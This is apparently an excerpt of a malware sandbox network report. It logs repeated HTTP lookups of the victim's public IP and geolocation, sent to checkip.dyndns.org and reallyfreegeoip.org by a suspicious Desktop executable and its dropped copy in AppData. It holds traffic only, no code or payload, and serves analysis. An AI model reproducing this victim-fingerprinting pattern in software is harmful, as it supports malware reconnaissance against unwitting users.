                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.449764132.226.8.169807180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:26.003593922 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:28.207456112 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:28 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.449767132.226.8.169807552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:28.252671957 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:33.059257984 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:32 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.449770132.226.8.169807552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:33.723587036 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:35.715447903 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.449773132.226.8.169807552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:36.346575022 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:38.217669964 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.449775132.226.8.169807552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 30, 2024 15:03:38.824012995 CEST151OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                          Host: checkip.dyndns.org
                                                          Connection: Keep-Alive
                                                          Sep 30, 2024 15:03:39.961122990 CEST272INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:39 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 103
                                                          Connection: keep-alive
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449736188.114.97.34437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:06 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          Connection: Keep-Alive
                                                          2024-09-30 13:03:06 UTC674INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:06 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17417
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGgNz388eZ3clN7VH1iqYY9uMHiIvh0SFjIKHziwKuJmG2pRExVhplURlwox4mVkT9p%2F%2FXGzeR2ZUOlbkA78jjitNPgJikH6W08bcrfBQY8PSJWutBEQWY4h9WwiJOKMGN00wjAu"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469422dbf427c-EWR
                                                          2024-09-30 13:03:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449737188.114.97.34437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:08 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:08 UTC676INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:08 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17419
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RaZW3pA1EvEcaISl1GyVnZLp%2FHlirLa8di5iY6jnGZFRAkL40i8FADi6iAVJxGHhWS9D2PVaVn9BmDnd%2FRPjPfHlgmWRveDXuysgBJ%2BlWXl9IAvmwR9pWC5JZhcmKrOd5SyKvLH0"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb4694e28790f5f-EWR
                                                          2024-09-30 13:03:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449739188.114.97.34437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:10 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:11 UTC672INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:11 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17422
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trw8mck2yj1O9lvcf57FPINePVPi7QgoYudagzIWeEcwZXmMEFZG0fmr85s3IDpCQ8fGB3NnbYDVhJYhbNGWJy5qwpOv5Zi2lJITlzr%2BmteYHk5xmnm7bCWvYKw2r6cECizzzjvr"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb4695db83642a5-EWR
                                                          2024-09-30 13:03:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449742188.114.97.34437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:12 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:12 UTC680INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:12 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17423
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8zUu3uRmBe%2FMv2SSQPke7u4bDI8zu%2BtAAdP0BMUkandLMf43%2BjiasQM1lNdTeAuB2tRR%2BH9uF3oZ14Hqt5HF%2BDyVknMBguGSGV8TaZjhIOx2tGKucVLD8AVO2NAbhp5Ny4Wnu4w"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469695bcd4299-EWR
                                                          2024-09-30 13:03:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449745188.114.97.34437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:14 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:14 UTC682INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:14 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17425
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KrCQw1zsIvPc25%2B%2BRH4SPo1K%2Bfd1I12KOQOP5RMtLMT3uhyYlsy6HlUZQLlaPtGKcH1Tusbjh9e8BQD0Bu2Z1r%2FxQK7Sc36XmAb%2FdcY%2FpIg625JJ44mH7CmmufiwN76CBb7T3GR6"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469731b3843a9-EWR
                                                          2024-09-30 13:03:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.449744188.114.97.34437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:14 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          Connection: Keep-Alive
                                                          2024-09-30 13:03:14 UTC676INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:14 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17425
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGHISRFRI8rrs8Zv4k21D4yHEKFzT5Zg7lBqv%2BiW3qG2Ce4PGoJZC4kH40FQtttsf68yrkzIMSz01YP9%2Bjk0hG4EOhQgMMXZs4gOZTBD0FfqXneLJu0%2Bnz2sS6aYDN6f4j9kwbAE"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb46972ef6041e0-EWR
                                                          2024-09-30 13:03:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.449752188.114.97.34437552C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:17 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:17 UTC674INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:17 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17428
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qGKXibb3Z7urffIAtXtJqaHCbAumYPwDKBSFpa3KQ57oZoB%2Fkcz5EngeObfjDfBcwrW0iufcjDUVzIbGgPKmO8c2DkqkaIJ3Tfgxy5jfocWvS6bvU%2BbxtPNxqM1MPc89roM2iDbT"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb46983ccc119a1-EWR
                                                          2024-09-30 13:03:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                          2024-09-30 13:03:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.449753188.114.97.34437180C:\Users\user\Desktop\3140, EUR.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-09-30 13:03:17 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                          Host: reallyfreegeoip.org
                                                          2024-09-30 13:03:17 UTC672INHTTP/1.1 200 OK
                                                          Date: Mon, 30 Sep 2024 13:03:17 GMT
                                                          Content-Type: application/xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          vary: Accept-Encoding
                                                          Cache-Control: max-age=86400
                                                          CF-Cache-Status: HIT
                                                          Age: 17428
                                                          Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BpfdUtPxJ8jC7ctHF9FK3CBK3QR0AvmFIe7xtuecBbSNEy6budkqWGA3eYAOSCg4xz4gNRhDKYcsmSVbDrixdLMO5WYovZLJnAzYFIM7snPfsVMCqO0CoOEe0Ly31a92DJOEq1Gm"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8cb469856b86437f-EWR
